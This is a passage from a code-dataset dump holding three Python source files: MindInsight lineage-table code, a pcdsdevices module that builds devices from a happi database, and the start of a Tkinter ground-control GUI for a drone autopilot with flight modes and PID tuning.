It contains summary\n directories generated by training.\n search_condition (dict): The search condition.\n \"\"\"\n if data_manager is None and summary_base_dir is None:\n raise LineageParamTypeError(\"One of data_manager or summary_base_dir needs to be specified.\")\n\n if data_manager is None:\n summary_base_dir = normalize_summary_dir(summary_base_dir)\n else:\n summary_base_dir = data_manager.summary_base_dir\n\n search_condition = {} if search_condition is None else search_condition\n\n try:\n validate_condition(search_condition)\n validate_search_model_condition(SearchModelConditionParameter, search_condition)\n except MindInsightException as error:\n log.error(str(error))\n log.exception(error)\n raise LineageSearchConditionParamError(str(error.message))\n\n try:\n search_condition = _convert_relative_path_to_abspath(summary_base_dir, search_condition)\n except (LineageParamValueError, LineageDirNotExistError) as error:\n log.error(str(error))\n log.exception(error)\n raise LineageParamSummaryPathError(str(error.message))\n\n try:\n lineage_objects = LineageOrganizer(data_manager, summary_base_dir).super_lineage_objs\n result = Querier(lineage_objects).filter_summary_lineage(\n condition=search_condition,\n added=added\n )\n except LineageSummaryParseException:\n result = {'object': [], 'count': 0}\n except (LineageQuerierParamException, LineageParamTypeError) as error:\n log.error(str(error))\n log.exception(error)\n raise LineageQuerySummaryDataError(\"Filter summary lineage failed.\")\n\n return result\n\n\ndef _convert_relative_path_to_abspath(summary_base_dir, search_condition):\n \"\"\"\n Convert relative path to absolute path.\n\n Args:\n summary_base_dir (str): The summary base directory.\n search_condition (dict): The search condition.\n\n Returns:\n dict, the updated search_condition.\n\n Raises:\n LineageParamValueError: If the value of input_name is invalid.\n \"\"\"\n if (\"summary_dir\" not in search_condition) or (not search_condition.get(\"summary_dir\")):\n return search_condition\n\n summary_dir_condition = search_condition.get(\"summary_dir\")\n\n if 'in' in summary_dir_condition:\n summary_paths = []\n for summary_dir in summary_dir_condition.get('in'):\n if summary_dir.startswith('./'):\n abs_dir = os.path.join(\n summary_base_dir, summary_dir[2:]\n )\n abs_dir = validate_path(abs_dir)\n else:\n abs_dir = validate_path(summary_dir)\n summary_paths.append(abs_dir)\n search_condition.get('summary_dir')['in'] = summary_paths\n\n if 'eq' in summary_dir_condition:\n summary_dir = summary_dir_condition.get('eq')\n if summary_dir.startswith('./'):\n abs_dir = os.path.join(\n summary_base_dir, summary_dir[2:]\n )\n abs_dir = validate_path(abs_dir)\n else:\n abs_dir = validate_path(summary_dir)\n search_condition.get('summary_dir')['eq'] = abs_dir\n\n return search_condition\n\n\ndef get_lineage_table(data_manager, search_condition):\n \"\"\"Get lineage data in a table from data manager.\"\"\"\n summary_base_dir = data_manager.summary_base_dir\n lineages = filter_summary_lineage(data_manager=data_manager, search_condition=search_condition)\n lineage_objects = lineages.get(\"object\", [])\n\n # Step 1, get column names\n column_names = _get_columns_name(lineage_objects)\n\n # Step 2, collect data\n column_data = _organize_data_to_matrix(lineage_objects, column_names, summary_base_dir)\n\n return LineageTable(pd.DataFrame(column_data))\n\n\ndef _get_columns_name(lineage_objects):\n \"\"\"Get columns name.\"\"\"\n column_names = set()\n user_defined_num = 0\n for lineage 
in lineage_objects:\n        model_lineage = lineage.get(\"model_lineage\", {})\n        metric = model_lineage.get(\"metric\", {})\n        metric_names = tuple('{}{}'.format(_METRIC_PREFIX, key) for key in metric.keys())\n        user_defined = model_lineage.get(\"user_defined\", {})\n        user_defined_names = tuple('{}{}'.format(_USER_DEFINED_PREFIX, key) for key in user_defined.keys())\n        # metric and user_defined are expanded with prefixes above, so exclude them from the plain columns\n        # (building the list directly avoids removing items from a list while iterating it, which can skip entries)\n        model_lineage_temp = [key for key in model_lineage.keys() if key not in (\"metric\", \"user_defined\")]\n        column_names.update(model_lineage_temp)\n        column_names.update(metric_names)\n        if user_defined_num + len(user_defined_names) <= USER_DEFINED_INFO_LIMIT:\n            column_names.update(user_defined_names)\n            user_defined_num += len(user_defined_names)\n        elif user_defined_num < USER_DEFINED_INFO_LIMIT <= user_defined_num + len(user_defined_names):\n            names = []\n            for i in range(USER_DEFINED_INFO_LIMIT - user_defined_num):\n                names.append(user_defined_names[i])\n            column_names.update(names)\n            user_defined_num += len(names)\n            log.info(\"Partial user_defined_info is deleted. Currently saved length is: %s.\", user_defined_num)\n        else:\n            log.info(\"The quantity of user_defined_info has reached the limit %s.\", USER_DEFINED_INFO_LIMIT)\n    column_names.update([\"train_id\"])\n\n    return column_names\n\n\ndef _organize_data_to_matrix(lineage_objects, column_names, summary_base_dir):\n    \"\"\"Collect data and transform to matrix.\"\"\"\n    cnt_lineages = len(lineage_objects)\n    column_data = {key: [None] * cnt_lineages for key in column_names}\n    for ind, lineage in enumerate(lineage_objects):\n\n        train_id = get_relative_path(lineage.get(\"summary_dir\"), summary_base_dir)\n\n        model_lineage = lineage.get(\"model_lineage\", {})\n        metric = model_lineage.pop(\"metric\", {})\n        metric_content = {\n            '{}{}'.format(_METRIC_PREFIX, key): val for key, val in metric.items()\n        }\n        user_defined = model_lineage.pop(\"user_defined\", {})\n        user_defined_content = {\n            '{}{}'.format(_USER_DEFINED_PREFIX, key): val for key, val in user_defined.items()\n        }\n        final_content = {}\n        final_content.update(model_lineage)\n        final_content.update(metric_content)\n        final_content.update(user_defined_content)\n        final_content.update({\"train_id\": train_id})\n        for key, val in final_content.items():\n            if isinstance(val, str) and val.lower() in ['nan', 'inf']:\n                val = np.nan\n            if key in column_data:\n                column_data[key][ind] = val\n    return column_data\n\n\nclass LineageTable:\n    \"\"\"Wrap lineage data in a table.\"\"\"\n    _LOSS_NAME = \"loss\"\n    _NOT_TUNABLE_NAMES = [_LOSS_NAME, \"train_id\", \"device_num\", \"model_size\",\n                          \"test_dataset_count\", \"train_dataset_count\"]\n\n    def __init__(self, df: pd.DataFrame):\n        self._df = df\n        self.train_ids = self._df[\"train_id\"].tolist()\n        self._drop_columns_info = []\n        self._remove_unsupported_columns()\n\n    def _remove_unsupported_columns(self):\n        \"\"\"Remove unsupported columns.\"\"\"\n        columns_to_drop = []\n        for name, data in self._df.iteritems():\n            if not is_simple_numpy_number(data.dtype):\n                columns_to_drop.append(name)\n\n        if columns_to_drop:\n            log.debug(\"Unsupported columns: %s\", columns_to_drop)\n            self._df = self._df.drop(columns=columns_to_drop)\n\n        for name in columns_to_drop:\n            if not name.startswith(_USER_DEFINED_PREFIX):\n                continue\n            self._drop_columns_info.append({\n                \"name\": name,\n                \"unselected\": True,\n                \"reason_code\": ReasonCode.NOT_ALL_NUMBERS.value\n            })\n\n    @property\n    def target_names(self):\n        \"\"\"Get names for optimize targets (eg loss, accuracy).\"\"\"\n        target_names = 
[name for name in self._df.columns if name.startswith(_METRIC_PREFIX)]\n if self._LOSS_NAME in self._df.columns:\n target_names.append(self._LOSS_NAME)\n return target_names\n\n @property\n def hyper_param_names(self, tunable=True):\n \"\"\"Get hyper param names.\"\"\"\n blocked_names = self._get_blocked_names(tunable)\n\n hyper_param_names = [\n name for name in self._df.columns\n if not name.startswith(_METRIC_PREFIX) and name not in blocked_names]\n\n if self._LOSS_NAME in hyper_param_names:\n hyper_param_names.remove(self._LOSS_NAME)\n\n return hyper_param_names\n\n def _get_blocked_names(self, tunable):\n if tunable:\n block_names = self._NOT_TUNABLE_NAMES\n else:\n block_names = []\n return block_names\n\n @property\n def user_defined_hyper_param_names(self):\n \"\"\"Get user defined hyper param names.\"\"\"\n names = [name for name in self._df.columns if name.startswith(_USER_DEFINED_PREFIX)]\n return names\n\n def get_column(self, name):\n \"\"\"\n Get data for specified column.\n Args:\n name (str): column name.\n\n Returns:\n np.ndarray, specified column.\n\n \"\"\"\n return self._df[name]\n\n def get_column_values(self, name):\n \"\"\"\n Get data for specified column.\n Args:\n name (str): column name.\n\n Returns:\n list, specified column data. If value is np.nan, transform to None.\n\n \"\"\"\n return [None if np.isnan(num) else num for num in self._df[name].tolist()]\n\n @property\n def df(self):\n \"\"\"Get the DataFrame.\"\"\"\n return self._df\n\n @property\n def drop_column_info(self):\n \"\"\"Get dropped columns info.\"\"\"\n return self._drop_columns_info\n","sub_path":"mindinsight/lineagemgr/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":14667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"182481951","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nRead the beamline database and construct objects\n\"\"\"\nimport logging\n\nimport happi\n\nimport pcdsdevices\n\nlogger = logging.getLogger(__name__)\n_client = None\n\n\ndef read_happi(client=None):\n \"\"\"\n Connect to the happi database and return a list of all devices.\n\n Parameters\n ----------\n client : happi.Client, optional\n Instance of Client to use for the read. Included as a parameter to be\n substituted with the mock client for testing. If not provided, we'll\n use the default client.\n\n Returns\n -------\n devices : list of happi.Device\n \"\"\"\n if client is None:\n global _client\n if _client is None:\n logger.info(\"Instantiating happi client\")\n _client = happi.Client()\n client = _client\n logger.info(\"Requesting all devices from happi client of class %s\",\n type(client))\n return client.all_devices\n\n\ndef construct_device(happi_object, device_class=None, info_map=None, **kwargs):\n \"\"\"\n Create a functional device from the information stored in a happi device.\n\n Parameters\n ----------\n happi_object : happi.Device\n\n device_class : class, optional\n Class to instantiate with given happi information. If no class is given\n one will be selected using the :func:`.pick_class` function\n\n info_map : dict, optional\n Rename happi information to match Device keywords. 
Conversion from info\n name to keyword should be entered as happi info name -> device kwarg\n name pairs\n\n kwargs :\n Additional keywords are passed into the device constructor\n Returns\n -------\n device : ophyd.Device\n \"\"\"\n info = {}\n info_map = info_map or {}\n\n #Gather information from device\n for entry in happi_object.info_names:\n try:\n info[entry] = getattr(happi_object, entry)\n except AttributeError:\n pass\n logger.debug(\"Extracted info dictionary from happi: %s\", info)\n\n #Convert keyword information\n for key, value in info_map.items():\n info[value] = info.pop(key)\n\n #Class selection\n if not device_class:\n device_type = happi_object.__class__.__name__\n device_class = pick_class(device_type, info)\n\n #Instantiate device with information\n return device_class(db_info=happi_object.post(), **info, **kwargs)\n\n\ndef pick_class(base, info):\n \"\"\"\n Given information from happi, determine which device subclass to use. add\n kwargs to info if necessary.\n\n Parameters\n ----------\n base : str\n A string representation of the device class name from happi. These\n should always match an available class in module.\n info : dict\n A dictionary mapping of happi entry info to stored value. Eventually\n this will be passed as kwargs to instantiate the device object. This\n may be mutated in this function to pass additional args.\n \"\"\"\n clsname = base\n if base == \"PulsePicker\":\n if info[\"beamline\"] in (\"XCS\", \"XPP\"):\n clsname += \"Pink\"\n # TODO find ioc pvs as needed and add to info\n # probably scrape iocmanager and iocdata\n return getattr(pcdsdevices, clsname)\n","sub_path":"pcdsdevices/happireader.py","file_name":"happireader.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"79413124","text":"from tkinter import *\nfrom tkinter import filedialog\nimport threading\nimport Autopiloto_Def.Libreria_Control_5_GUI as LC\nimport Autopiloto_Def.Libreria_vision_GUI_2 as LV\nimport matplotlib\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nmatplotlib.use('TkAgg')\nfrom tensorflow.keras.models import load_model\n\n\n\nclass Pagina_principal():\n def __init__(self,raiz):\n self.Qgc=LC.QGC()\n self.raiz=raiz\n self.Verbose_options=Verbose_options()\n self.miframe = Frame(raiz)\n self.miframe.pack()\n self.Vision=0\n # ------------------------------------------------\n # -----------------Cajas texto--------------------\n # ------------------------------------------------\n self.metros = Entry(self.miframe)\n self.metros.grid(row=1, column=7)\n self.Latitud = Entry(self.miframe)\n self.Latitud.grid(row=2, column=5)\n self.Longitud = Entry(self.miframe)\n self.Longitud.grid(row=2, column=7)\n self.Pitch = Entry(self.miframe)\n self.Pitch.grid(row=7, column=5)\n self.Roll = Entry(self.miframe)\n self.Roll.grid(row=7, column=7)\n # ------------------------------------------------\n # -----------------Labels-------------------------\n # ------------------------------------------------\n Label(self.miframe, text=\"Latitud:\").grid(row=2, column=4)\n Label(self.miframe, text=\"Metros:\").grid(row=1, column=6)\n Label(self.miframe, text=\"Longitud:\").grid(row=2, column=6)\n Label(self.miframe, text=\"Pitch:\").grid(row=7, column=4)\n Label(self.miframe, text=\"Roll:\").grid(row=7, column=6)\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n 
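# Each flight-mode button below starts a Boton worker thread running its LC routine and disables the other mode buttons while active\n        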
self.GoTo = Button(self.miframe, text=\" GoTo \",command=self.Actuar_GoTo,bg='white',width=10)\n self.GoTo.grid(row=2, column=8)\n self.GoTo_activo=0\n self.Waypoint=LC.Waypoint(21,-157,500,100,1)\n self.Mission = Button(self.miframe, text=\"Mission\",command=self.Actuar_Mision,bg='white',width=10)\n self.Mission.grid(row=3, column=8,padx=5)\n self.Mission_activo = 0\n self.Altitud = Button(self.miframe, text=\"Altitud\",command=self.Actuar_Altitud,bg='white',width=10)\n self.Altitud.grid(row=1, column=8)\n self.Altitud_activo=0\n self.Altitud_vuelo=500\n self.Takeoff = Button(self.miframe, text=\"Takeoff\",command=self.Actuar_Takeoff,bg='white',width=10)\n self.Takeoff.grid(row=4, column=8)\n self.Takeoff_activo=0\n self.Land = Button(self.miframe, text=\" Land \",command=self.Actuar_Land,bg='white',width=10)\n self.Land.grid(row=5, column=8)\n self.Land_activo = 0\n self.AutoLand = Button(self.miframe, text=\" Auto-Land \",command=self.Actuar_Auto_Land,bg='white',width=10)\n self.AutoLand.grid(row=6, column=8)\n self.AutoLand_activo = 0\n self.Calibracion = Button(self.miframe, text=\" Calibracion \",command=self.Actuar_Calibracion,bg='white',width=10)\n self.Calibracion.grid(row=7, column=8)\n self.Calibracion_activo = 0\n # ------------------------------------------------\n # -----------------Texto--------------------------\n # ------------------------------------------------\n Label(self.miframe, text=\"Output:\").place(x=0,y=80)\n self.Texto=Text(self.miframe,background=\"white\", width=38, height=6)\n self.Texto.place(x=45,y=55)\n # ------------------------------------------------\n # -----------------Menu---------------------------\n # ------------------------------------------------\n menu = Menu(raiz)\n raiz.config(menu=menu)\n # Mission\n Mission = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Mission\", menu=Mission)\n Mission.add_command(label=\"Create Mission\",command=lambda:Pagina_Mission(self.miframe,self.Qgc,self))\n Mission.add_command(label=\"Load Mission\", command=self.Cargar_mission)\n # Control\n Control = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Control\", menu=Control)\n Control.add_command(label=\"Tunning PID\",command=lambda:Pagina_PIDs(self.miframe,self.Qgc,self))\n Control.add_command(label=\"Load PID\", command=self.Cargar_PIDs)\n # Verbose\n Verbose = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Verbose\", menu=Verbose)\n Verbose.add_command(label=\"Options\",command=lambda:Pagina_Verbose(self.miframe,self))\n # Comm\n Comunications = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Comunications\", menu=Comunications)\n Comunications.add_command(label=\"Config\",command=lambda:Pagina_Comm(self.miframe,self))\n # IA\n IA = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"IA\", menu=IA)\n IA.add_command(label=\"IA config\",command=lambda:Pagina_IA(self.miframe,self))\n\n if self.Qgc.Modelo is None:\n self.AutoLand.configure(state=DISABLED)\n if self.Qgc.Mission is None or self.Qgc.Modelo is None:\n self.Mission.configure(state=DISABLED)\n\n\n # ------------------------------------------------\n # -----------------Funciones Menu-----------------\n # ------------------------------------------------\n def Cargar_mission(self):\n Fichero = filedialog.askopenfilename(title=\"Abrir\", filetypes=((\"Fichero txt\", \"*.txt\"),))\n Mission = []\n try:\n Fichero = open(Fichero, \"r\")\n for lines in Fichero.readlines():\n line = lines.split(',')\n Mission.append(LC.Waypoint(float(line[0]), float(line[1]), float(line[2]), int(line[3]), int(line[4])))\n 
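Fichero.close()  # release the mission file handle once every waypoint line has been parsed\n            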
self.Qgc.Mission = Mission\n self.Texto.insert(\"insert\", \"Mision cargada correctamente\\n\")\n print('Cargada')\n if self.Qgc.Modelo is not None:\n self.Mission.configure(state=NORMAL)\n else:\n print('Falta IA')\n self.Texto.insert(\"insert\", \"Falta IA\\n\")\n except: # Si no hay mision se define una por defecto\n print('No hay mision')\n\n def Cargar_PIDs(self):\n Control=LC.PIDs()\n i=0\n Fichero = filedialog.askopenfilename(title=\"Abrir\", filetypes=((\"Fichero txt\", \"*.txt\"),))\n try:\n Fichero = open(Fichero, \"r\")\n for lines in Fichero.readlines():\n line = lines.split(',')\n if i==0:\n Control.PID_Heading.tunings=(float(line[0]), float(line[1]), float(line[2]))\n elif i==1:\n Control.PID_Altitud.tunings=(float(line[0]), float(line[1]), float(line[2]))\n elif i==2:\n Control.PID_Roll.tunings=(float(line[0]), float(line[1]), float(line[2]))\n elif i==3:\n Control.PID_Pitch.tunings=(float(line[0]), float(line[1]), float(line[2]))\n elif i==4:\n Control.PID_AirSpeed.tunings=(float(line[0]), float(line[1]), float(line[2]))\n i+=1\n self.Qgc.Control = Control\n print('Cargados')\n except: # Si no hay mision se define una por defecto\n print('No hay PIDs o no estan completos')\n\n # ------------------------------------------------\n # -----------------FUNCIONES BOTONES--------------\n # ------------------------------------------------\n\n def Actuar_Mision(self):\n if self.Mission_activo==0:\n if not self.Vision.is_alive():\n self.Vision=LV.Vision(self.Qgc.Cola,self.Qgc.Modelo,self.Texto)\n self.hilo = Boton(self,LC.Mission)\n self.hilo.start()\n self.Mission.config(bg=\"green\")\n self.Mission_activo=1\n # Deshabilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n self.Takeoff.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.Mission.config(bg=\"white\")\n self.Mission_activo=0\n self.hilo.Parar()\n #Habilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n self.Takeoff.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Actuar_Altitud(self):\n if self.Altitud_activo == 0:\n if self.metros.get()!=\"\":\n self.Altitud_vuelo=float(self.metros.get())\n else:\n self.Altitud_vuelo=600\n print('No hay altura')\n self.hilo = Boton(self, LC.Altitud)\n self.hilo.start()\n self.Altitud.config(bg=\"green\")\n self.Altitud_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.Mission.configure(state=DISABLED)\n self.Takeoff.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.Altitud.config(bg=\"white\")\n self.Altitud_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Takeoff.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def 
Actuar_Land(self):\n if self.Land_activo == 0:\n self.hilo = Boton(self,LC.Land)\n self.hilo.start()\n self.Land.config(bg=\"green\")\n self.Land_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n self.Mission.configure(state=DISABLED)\n self.Takeoff.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.Land.config(bg=\"white\")\n self.Land_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Takeoff.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Actuar_Takeoff(self):\n if self.Takeoff_activo == 0:\n self.hilo = Boton(self, LC.Takeoff)\n self.hilo.start()\n self.Takeoff.config(bg=\"green\")\n self.Takeoff_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n self.Mission.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.Takeoff.config(bg=\"white\")\n self.Takeoff_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.GoTo.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Actuar_GoTo(self):\n if self.GoTo_activo == 0:\n if self.Latitud.get()!=\"\" and self.Longitud.get()!=\"\":\n self.Waypoint.lat=float(self.Latitud.get())\n self.Waypoint.lon = float(self.Longitud.get())\n self.hilo = Boton(self, LC.Nav)\n self.hilo.start()\n self.GoTo.config(bg=\"green\")\n self.GoTo_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n self.Mission.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.GoTo.config(bg=\"white\")\n self.GoTo_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Actuar_Auto_Land(self):\n if self.AutoLand_activo == 0:\n if not self.Vision.is_alive():\n self.Vision=LV.Vision(self.Qgc.Cola,self.Qgc.Modelo,self.Texto)\n self.hilo = Boton(self, LC.Aterrizaje_autonomo)\n self.hilo.start()\n self.AutoLand.config(bg=\"green\")\n self.AutoLand_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n 
self.Mission.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.GoTo.configure(state=DISABLED)\n self.Calibracion.configure(state=DISABLED)\n else:\n self.AutoLand.config(bg=\"white\")\n self.AutoLand_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n self.GoTo.configure(state=NORMAL)\n self.Calibracion.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Actuar_Calibracion(self):\n if self.Calibracion_activo == 0:\n Roll=0\n Pitch=0\n if self.Roll.get() != \"\":\n Roll=float(self.Roll.get())\n if self.Pitch.get() != \"\":\n Pitch=float(self.Pitch.get())\n self.hilo = Boton(self, LC.Bajo_nivel,Roll=Roll,Pitch=Pitch)\n self.hilo.start()\n self.Calibracion.config(bg=\"green\")\n self.Calibracion_activo = 1\n # Deshabilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=DISABLED)\n self.Altitud.configure(state=DISABLED)\n self.Mission.configure(state=DISABLED)\n self.Land.configure(state=DISABLED)\n self.GoTo.configure(state=DISABLED)\n self.AutoLand.configure(state=DISABLED)\n else:\n self.Calibracion.config(bg=\"white\")\n self.Calibracion_activo = 0\n self.hilo.Parar()\n # Habilitar los botones de otros modos de vuelo\n self.Takeoff.configure(state=NORMAL)\n self.Altitud.configure(state=NORMAL)\n if self.Qgc.Mission is not None:\n self.Mission.configure(state=NORMAL)\n self.Land.configure(state=NORMAL)\n self.GoTo.configure(state=NORMAL)\n if self.Qgc.Modelo is not None:\n self.AutoLand.configure(state=NORMAL)\n self.Plotear()\n if self.Verbose_options.Clean==1:\n self.Clean()\n\n def Plotear(self):\n if self.Verbose_options.Heading:\n Pagina_Plots(self.miframe,self.Qgc.Verbose.Plot_Heading(self))\n if self.Verbose_options.Altitud:\n Pagina_Plots(self.miframe, self.Qgc.Verbose.Plot_altitud(self))\n if self.Verbose_options.pitch:\n Pagina_Plots(self.miframe, self.Qgc.Verbose.Plot_Pitch(self))\n if self.Verbose_options.Roll:\n Pagina_Plots(self.miframe, self.Qgc.Verbose.Plot_Roll(self))\n if self.Verbose_options.Vel:\n Pagina_Plots(self.miframe, self.Qgc.Verbose.Plot_Vel(self))\n if self.Verbose_options.Posicion:\n Pagina_Plots(self.miframe, self.Qgc.Verbose.Plot_Posicion(self))\n\n\n\n\n def Clean(self):\n self.Qgc.Verbose=LC.Verbose_controls()\n\n\n# ------------------------------------------------\n# -----------------CLASES AUXILIARES--------------\n# ------------------------------------------------\n\nclass Boton(threading.Thread):\n def __init__(self,Main,Funcion,Roll=0,Pitch=0):\n threading.Thread.__init__(self)\n self.Main=Main\n self.Vivo=1\n self.Qgc=Main.Qgc\n self.Funcion=Funcion\n self.Altitud_vuelo=Main.Altitud_vuelo\n self.waypoint=Main.Waypoint\n self.Vision=Main.Vision\n self.pitch=Pitch\n self.Roll=Roll\n self.Hoja_Ruta=0\n def run(self):\n while (1):\n if self.Vivo:\n self.Funcion(self)\n else:\n break\n print('Hilo muerto')\n\n def Get_vivo(self):\n return self.Vivo\n\n def Parar(self):\n self.Vivo=0\n\n\nclass Verbose_options():\n def __init__(self):\n self.Heading=1\n self.Altitud=0\n self.Roll=0\n self.pitch=0\n self.Vel=0\n self.Posicion=0\n self.Heading_save=0\n self.Altitud_save=0\n self.Roll_save=0\n self.pitch_save=0\n self.Vel_save=0\n self.Posicion_save=0\n self.Clean=1\n\n\n\n# ------------------------------------------------\n# -----------------VENTANA 
PIDs-------------------\n# ------------------------------------------------\n\nclass Pagina_PIDs():\n def __init__(self,raiz,Qgc,Frame_principal):\n self.Qgc=Qgc\n self.Principal=Frame_principal\n miframe = Toplevel(raiz)\n miframe.title(\"PIDs Editor\")\n # ------------------------------------------------\n # -----------------Cajas texto--------------------\n # ------------------------------------------------\n self.kp = Entry(miframe)\n self.kp.grid(row=1, column=7)\n self.ki = Entry(miframe)\n self.ki.grid(row=2, column=7)\n self.kd = Entry(miframe)\n self.kd.grid(row=3, column=7)\n # ------------------------------------------------\n # -----------------Labels-------------------------\n # ------------------------------------------------\n Label(miframe, text=\"ki:\").grid(row=2, column=6)\n Label(miframe, text=\"kp:\").grid(row=1, column=6)\n Label(miframe, text=\"kd:\").grid(row=3, column=6)\n # ------------------------------------------------\n # -----------------Botones------------------------\n # ------------------------------------------------\n self.Export = Button(miframe, text=\" Export \",command=self.Exportar_PIDs)\n self.Export.grid(row=4, column=6)\n self.Save = Button(miframe, text=\" Save \",command=self.save)\n self.Save.grid(row=4, column=7)\n Button(miframe, text=\" + \",command=lambda:self.Sumar(0)).grid(row=1, column=8)\n Button(miframe, text=\" + \",command=lambda:self.Sumar(1)).grid(row=2, column=8)\n Button(miframe, text=\" + \",command=lambda:self.Sumar(2)).grid(row=3, column=8)\n Button(miframe, text=\" - \",command=lambda:self.Restar(0)).grid(row=1, column=5)\n Button(miframe, text=\" - \",command=lambda:self.Restar(1)).grid(row=2, column=5)\n Button(miframe, text=\" - \",command=lambda:self.Restar(2)).grid(row=3, column=5)\n # ------------------------------------------------\n # -----------------Combobox-----------------------\n # ------------------------------------------------\n OptionList=[\"Heading\",\"Rumbo\", \"Altitud\", \"Roll\", \"Pitch\", \"Velocidad\"]\n self.variable = StringVar(miframe)\n self.variable.set(OptionList[0])\n self.menu=OptionMenu(miframe, self.variable, *OptionList)\n self.menu.grid(row=0,column=0)\n self.set()\n self.variable.trace(\"w\", self.set)\n\n def Exportar_PIDs(self):\n Fichero = filedialog.askopenfilename(title=\"Abrir\", filetypes=((\"Fichero txt\", \"*.txt\"),))\n # try:\n Fichero = open(Fichero, \"w\")\n Fichero.write(str(self.Qgc.Control.PID_Heading.Kp)+\",\"+str(self.Qgc.Control.PID_Heading.Ki)+\",\"+str(self.Qgc.Control.PID_Heading.Kd)+\"\\n\")\n Fichero.write(str(self.Qgc.Control.PID_Altitud.Kp) + \",\" + str(self.Qgc.Control.PID_Altitud.Ki) + \",\" + str(self.Qgc.Control.PID_Altitud.Kd) + \"\\n\")\n Fichero.write(str(self.Qgc.Control.PID_Roll.Kp) + \",\" + str(self.Qgc.Control.PID_Roll.Ki) + \",\" + str(self.Qgc.Control.PID_Roll.Kd) + \"\\n\")\n Fichero.write(str(self.Qgc.Control.PID_Pitch.Kp) + \",\" + str(self.Qgc.Control.PID_Pitch.Ki) + \",\" + str(self.Qgc.Control.PID_Pitch.Kd) + \"\\n\")\n Fichero.write(str(self.Qgc.Control.PID_AirSpeed.Kp) + \",\" + str(self.Qgc.Control.PID_AirSpeed.Ki) + \",\" + str(self.Qgc.Control.PID_AirSpeed.Kd) + \"\\n\")\n print('Cargados')\n # except: # Si no hay mision se define una por defecto\n # print('No hay PIDs o no estan completos')\n\n def save(self):\n if self.variable.get()==\"Heading\":\n 